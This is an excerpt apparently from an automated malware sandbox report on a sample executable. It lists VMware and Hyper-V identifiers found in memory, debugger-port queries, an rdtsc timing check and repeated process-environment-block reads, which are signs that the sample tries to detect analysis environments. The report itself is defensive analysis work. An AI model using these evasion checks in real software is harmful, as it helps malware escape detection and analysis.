                Source: explorer.exe, 0000000C.00000000.1306325777.0000000003249000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.NoneVMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9dVMware20,1
                Source: explorer.exe, 0000000C.00000003.3074700657.0000000009013000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                Source: explorer.exe, 0000000C.00000000.1306325777.0000000003249000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
                Source: explorer.exe, 0000000C.00000000.1306325777.0000000003249000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SVGA II
                Source: explorer.exe, 0000000C.00000000.1308477475.0000000007306000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: War&Prod_VMware_xU1
                Source: explorer.exe, 0000000C.00000000.1312007503.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
                Source: explorer.exe, 0000000C.00000002.3741055942.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000I}~"
                Source: explorer.exe, 0000000C.00000003.3076196212.0000000009052000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000}io
                Source: explorer.exe, 0000000C.00000002.3741055942.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00
                Source: explorer.exe, 0000000C.00000002.3741055942.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1312007503.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\machine.inf_loc5
                Source: explorer.exe, 0000000C.00000000.1306325777.0000000003249000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware20,1
                Source: explorer.exe, 0000000C.00000000.1306325777.0000000003249000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
                Source: explorer.exe, 0000000C.00000000.1312007503.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMWare
                Source: explorer.exe, 0000000C.00000003.3076196212.0000000009052000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000'
                Source: explorer.exe, 0000000C.00000000.1308477475.0000000007306000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: explorer.exe, 0000000C.00000002.3741055942.0000000008F27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1312007503.0000000008F27000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWT`
                Source: explorer.exe, 0000000C.00000000.1306325777.0000000003249000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SVGA IIES1371
                Source: explorer.exe, 0000000C.00000000.1306325777.0000000003249000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware Virtual RAM
                Source: explorer.exe, 0000000C.00000000.1306325777.0000000003249000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                Source: explorer.exe, 0000000C.00000000.1300394418.0000000000C74000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                Source: explorer.exe, 0000000C.00000000.1312007503.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 0000000C.00000000.1300394418.0000000000C74000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Process queried: DebugPort
                Source: C:\Windows\SysWOW64\cmmon32.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_00409AA0 rdtsc | 11_2_00409AA0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0040ACE0 LdrLoadDll, | 11_2_0040ACE0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010CE10E mov eax, dword ptr fs:[00000030h] | 11_2_010CE10E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010CE10E mov ecx, dword ptr fs:[00000030h] | 11_2_010CE10E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010CE10E mov eax, dword ptr fs:[00000030h] | 11_2_010CE10E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010CE10E mov eax, dword ptr fs:[00000030h] | 11_2_010CE10E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010CE10E mov ecx, dword ptr fs:[00000030h] | 11_2_010CE10E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010CE10E mov eax, dword ptr fs:[00000030h] | 11_2_010CE10E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010CE10E mov eax, dword ptr fs:[00000030h] | 11_2_010CE10E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010CE10E mov ecx, dword ptr fs:[00000030h] | 11_2_010CE10E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010CE10E mov eax, dword ptr fs:[00000030h] | 11_2_010CE10E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010CE10E mov ecx, dword ptr fs:[00000030h] | 11_2_010CE10E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010CA118 mov ecx, dword ptr fs:[00000030h] | 11_2_010CA118
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010CA118 mov eax, dword ptr fs:[00000030h] | 11_2_010CA118
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010CA118 mov eax, dword ptr fs:[00000030h] | 11_2_010CA118
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010CA118 mov eax, dword ptr fs:[00000030h] | 11_2_010CA118
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010E0115 mov eax, dword ptr fs:[00000030h] | 11_2_010E0115
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01050124 mov eax, dword ptr fs:[00000030h] | 11_2_01050124
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010B4144 mov eax, dword ptr fs:[00000030h] | 11_2_010B4144
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010B4144 mov eax, dword ptr fs:[00000030h] | 11_2_010B4144
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010B4144 mov ecx, dword ptr fs:[00000030h] | 11_2_010B4144
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010B4144 mov eax, dword ptr fs:[00000030h] | 11_2_010B4144
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010B4144 mov eax, dword ptr fs:[00000030h] | 11_2_010B4144
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010B8158 mov eax, dword ptr fs:[00000030h] | 11_2_010B8158
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01026154 mov eax, dword ptr fs:[00000030h] | 11_2_01026154
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01026154 mov eax, dword ptr fs:[00000030h] | 11_2_01026154
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0101C156 mov eax, dword ptr fs:[00000030h] | 11_2_0101C156
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010F4164 mov eax, dword ptr fs:[00000030h] | 11_2_010F4164
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010F4164 mov eax, dword ptr fs:[00000030h] | 11_2_010F4164
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01060185 mov eax, dword ptr fs:[00000030h] | 11_2_01060185
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010DC188 mov eax, dword ptr fs:[00000030h] | 11_2_010DC188
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010DC188 mov eax, dword ptr fs:[00000030h] | 11_2_010DC188
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010C4180 mov eax, dword ptr fs:[00000030h] | 11_2_010C4180
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010C4180 mov eax, dword ptr fs:[00000030h] | 11_2_010C4180
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010A019F mov eax, dword ptr fs:[00000030h] | 11_2_010A019F
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010A019F mov eax, dword ptr fs:[00000030h] | 11_2_010A019F
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010A019F mov eax, dword ptr fs:[00000030h] | 11_2_010A019F
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010A019F mov eax, dword ptr fs:[00000030h] | 11_2_010A019F
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0101A197 mov eax, dword ptr fs:[00000030h] | 11_2_0101A197
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0101A197 mov eax, dword ptr fs:[00000030h] | 11_2_0101A197
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0101A197 mov eax, dword ptr fs:[00000030h] | 11_2_0101A197
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010E61C3 mov eax, dword ptr fs:[00000030h] | 11_2_010E61C3
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010E61C3 mov eax, dword ptr fs:[00000030h] | 11_2_010E61C3
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0109E1D0 mov eax, dword ptr fs:[00000030h] | 11_2_0109E1D0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0109E1D0 mov eax, dword ptr fs:[00000030h] | 11_2_0109E1D0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0109E1D0 mov ecx, dword ptr fs:[00000030h] | 11_2_0109E1D0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0109E1D0 mov eax, dword ptr fs:[00000030h] | 11_2_0109E1D0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0109E1D0 mov eax, dword ptr fs:[00000030h] | 11_2_0109E1D0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010F61E5 mov eax, dword ptr fs:[00000030h] | 11_2_010F61E5
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010501F8 mov eax, dword ptr fs:[00000030h] | 11_2_010501F8
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010A4000 mov ecx, dword ptr fs:[00000030h] | 11_2_010A4000
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010C2000 mov eax, dword ptr fs:[00000030h] | 11_2_010C2000
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010C2000 mov eax, dword ptr fs:[00000030h] | 11_2_010C2000
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010C2000 mov eax, dword ptr fs:[00000030h] | 11_2_010C2000
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010C2000 mov eax, dword ptr fs:[00000030h] | 11_2_010C2000
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010C2000 mov eax, dword ptr fs:[00000030h] | 11_2_010C2000
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010C2000 mov eax, dword ptr fs:[00000030h] | 11_2_010C2000
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010C2000 mov eax, dword ptr fs:[00000030h] | 11_2_010C2000
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010C2000 mov eax, dword ptr fs:[00000030h] | 11_2_010C2000
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0103E016 mov eax, dword ptr fs:[00000030h] | 11_2_0103E016
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0103E016 mov eax, dword ptr fs:[00000030h] | 11_2_0103E016
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0103E016 mov eax, dword ptr fs:[00000030h] | 11_2_0103E016
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0103E016 mov eax, dword ptr fs:[00000030h] | 11_2_0103E016
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0101A020 mov eax, dword ptr fs:[00000030h] | 11_2_0101A020
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0101C020 mov eax, dword ptr fs:[00000030h] | 11_2_0101C020
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010B6030 mov eax, dword ptr fs:[00000030h] | 11_2_010B6030
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01022050 mov eax, dword ptr fs:[00000030h] | 11_2_01022050
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010A6050 mov eax, dword ptr fs:[00000030h] | 11_2_010A6050
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0104C073 mov eax, dword ptr fs:[00000030h] | 11_2_0104C073
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0102208A mov eax, dword ptr fs:[00000030h] | 11_2_0102208A
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010180A0 mov eax, dword ptr fs:[00000030h] | 11_2_010180A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010B80A8 mov eax, dword ptr fs:[00000030h] | 11_2_010B80A8
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010E60B8 mov eax, dword ptr fs:[00000030h] | 11_2_010E60B8
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010E60B8 mov ecx, dword ptr fs:[00000030h] | 11_2_010E60B8
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010A20DE mov eax, dword ptr fs:[00000030h] | 11_2_010A20DE
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0101A0E3 mov ecx, dword ptr fs:[00000030h] | 11_2_0101A0E3
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010A60E0 mov eax, dword ptr fs:[00000030h] | 11_2_010A60E0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010280E9 mov eax, dword ptr fs:[00000030h] | 11_2_010280E9
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0101C0F0 mov eax, dword ptr fs:[00000030h] | 11_2_0101C0F0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010620F0 mov ecx, dword ptr fs:[00000030h] | 11_2_010620F0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0105A30B mov eax, dword ptr fs:[00000030h] | 11_2_0105A30B
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0105A30B mov eax, dword ptr fs:[00000030h] | 11_2_0105A30B
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0105A30B mov eax, dword ptr fs:[00000030h] | 11_2_0105A30B
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0101C310 mov ecx, dword ptr fs:[00000030h] | 11_2_0101C310
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01040310 mov ecx, dword ptr fs:[00000030h] | 11_2_01040310
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010F8324 mov eax, dword ptr fs:[00000030h] | 11_2_010F8324
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010F8324 mov ecx, dword ptr fs:[00000030h] | 11_2_010F8324
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010F8324 mov eax, dword ptr fs:[00000030h] | 11_2_010F8324
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010F8324 mov eax, dword ptr fs:[00000030h] | 11_2_010F8324
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010F634F mov eax, dword ptr fs:[00000030h] | 11_2_010F634F
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010A2349 mov eax, dword ptr fs:[00000030h] | 11_2_010A2349
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010A2349 mov eax, dword ptr fs:[00000030h] | 11_2_010A2349
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010A2349 mov eax, dword ptr fs:[00000030h] | 11_2_010A2349
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010A2349 mov eax, dword ptr fs:[00000030h] | 11_2_010A2349
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010A2349 mov eax, dword ptr fs:[00000030h] | 11_2_010A2349
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010A2349 mov eax, dword ptr fs:[00000030h] | 11_2_010A2349
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010A2349 mov eax, dword ptr fs:[00000030h] | 11_2_010A2349
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010A2349 mov eax, dword ptr fs:[00000030h] | 11_2_010A2349
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010A2349 mov eax, dword ptr fs:[00000030h] | 11_2_010A2349
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010A2349 mov eax, dword ptr fs:[00000030h] | 11_2_010A2349
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010A2349 mov eax, dword ptr fs:[00000030h] | 11_2_010A2349
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010A2349 mov eax, dword ptr fs:[00000030h] | 11_2_010A2349
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010A2349 mov eax, dword ptr fs:[00000030h] | 11_2_010A2349
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010A2349 mov eax, dword ptr fs:[00000030h] | 11_2_010A2349
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010A2349 mov eax, dword ptr fs:[00000030h] | 11_2_010A2349
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010A035C mov eax, dword ptr fs:[00000030h] | 11_2_010A035C
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010A035C mov eax, dword ptr fs:[00000030h] | 11_2_010A035C
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010A035C mov eax, dword ptr fs:[00000030h] | 11_2_010A035C
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010A035C mov ecx, dword ptr fs:[00000030h] | 11_2_010A035C
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010A035C mov eax, dword ptr fs:[00000030h] | 11_2_010A035C
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010A035C mov eax, dword ptr fs:[00000030h] | 11_2_010A035C
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010EA352 mov eax, dword ptr fs:[00000030h] | 11_2_010EA352
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010C8350 mov ecx, dword ptr fs:[00000030h] | 11_2_010C8350
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010C437C mov eax, dword ptr fs:[00000030h] | 11_2_010C437C
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0101E388 mov eax, dword ptr fs:[00000030h] | 11_2_0101E388
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0101E388 mov eax, dword ptr fs:[00000030h] | 11_2_0101E388
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0101E388 mov eax, dword ptr fs:[00000030h] | 11_2_0101E388
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0104438F mov eax, dword ptr fs:[00000030h] | 11_2_0104438F
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0104438F mov eax, dword ptr fs:[00000030h] | 11_2_0104438F
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01018397 mov eax, dword ptr fs:[00000030h] | 11_2_01018397
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01018397 mov eax, dword ptr fs:[00000030h] | 11_2_01018397
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_01018397 mov eax, dword ptr fs:[00000030h] | 11_2_01018397
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010DC3CD mov eax, dword ptr fs:[00000030h] | 11_2_010DC3CD
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0102A3C0 mov eax, dword ptr fs:[00000030h] | 11_2_0102A3C0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0102A3C0 mov eax, dword ptr fs:[00000030h] | 11_2_0102A3C0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0102A3C0 mov eax, dword ptr fs:[00000030h] | 11_2_0102A3C0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0102A3C0 mov eax, dword ptr fs:[00000030h] | 11_2_0102A3C0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0102A3C0 mov eax, dword ptr fs:[00000030h] | 11_2_0102A3C0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0102A3C0 mov eax, dword ptr fs:[00000030h] | 11_2_0102A3C0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010283C0 mov eax, dword ptr fs:[00000030h] | 11_2_010283C0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010283C0 mov eax, dword ptr fs:[00000030h] | 11_2_010283C0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010283C0 mov eax, dword ptr fs:[00000030h] | 11_2_010283C0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010283C0 mov eax, dword ptr fs:[00000030h] | 11_2_010283C0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010A63C0 mov eax, dword ptr fs:[00000030h] | 11_2_010A63C0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010CE3DB mov eax, dword ptr fs:[00000030h] | 11_2_010CE3DB
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010CE3DB mov eax, dword ptr fs:[00000030h] | 11_2_010CE3DB
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010CE3DB mov ecx, dword ptr fs:[00000030h] | 11_2_010CE3DB
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010CE3DB mov eax, dword ptr fs:[00000030h] | 11_2_010CE3DB
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010C43D4 mov eax, dword ptr fs:[00000030h] | 11_2_010C43D4
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010C43D4 mov eax, dword ptr fs:[00000030h] | 11_2_010C43D4
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010303E9 mov eax, dword ptr fs:[00000030h] | 11_2_010303E9
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010303E9 mov eax, dword ptr fs:[00000030h] | 11_2_010303E9
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010303E9 mov eax, dword ptr fs:[00000030h] | 11_2_010303E9
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010303E9 mov eax, dword ptr fs:[00000030h] | 11_2_010303E9
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010303E9 mov eax, dword ptr fs:[00000030h] | 11_2_010303E9
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010303E9 mov eax, dword ptr fs:[00000030h] | 11_2_010303E9
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010303E9 mov eax, dword ptr fs:[00000030h] | 11_2_010303E9
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010303E9 mov eax, dword ptr fs:[00000030h] | 11_2_010303E9
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0103E3F0 mov eax, dword ptr fs:[00000030h] | 11_2_0103E3F0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0103E3F0 mov eax, dword ptr fs:[00000030h] | 11_2_0103E3F0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0103E3F0 mov eax, dword ptr fs:[00000030h] | 11_2_0103E3F0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010563FF mov eax, dword ptr fs:[00000030h] | 11_2_010563FF
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_0101823B mov eax, dword ptr fs:[00000030h] | 11_2_0101823B
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_010A8243 mov eax, dword ptr fs:[00000030h] | 11_2_010A8243
